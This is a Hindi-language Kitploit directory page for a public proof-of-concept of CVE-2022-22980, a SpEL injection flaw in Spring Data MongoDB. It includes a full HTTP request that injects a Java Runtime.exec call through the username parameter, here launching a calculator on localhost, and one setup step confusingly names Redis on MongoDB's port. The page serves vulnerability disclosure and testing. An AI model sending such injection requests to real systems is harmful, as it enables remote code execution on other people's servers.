Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-22980 — CVE-2022-22980 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Spring Data MongoDB में username पैरामीटर में SpEL इंजेक्शन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/jweny/cve-2022-22980
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubjweny/cve-2022-22980

cve-2022-22980

CVE-2022-22980 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Spring Data MongoDB में username पैरामीटर में SpEL इंजेक्शन के माध्यम से रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।

रिपॉजिटरी देखें
10314 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

spring-data-mongodb-cve-2022-22980-exp

एक तुच्छ कमजोरी, बस एक रिकॉर्ड।

  1. redis शुरू करें, पोर्ट 27017

  2. प्रोजेक्ट शुरू करें, springboot पोर्ट 6666 पर शुरू होता है

    image-20220622155615142

  3. image-20220622155830238

root@kitploit:~
GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2


संदर्भ:

  • https://github.com/li8u99/Spring-Data-Mongodb-Demo
  • https://github.com/trganda/CVE-2022-22980
टूल डाउनलोड करें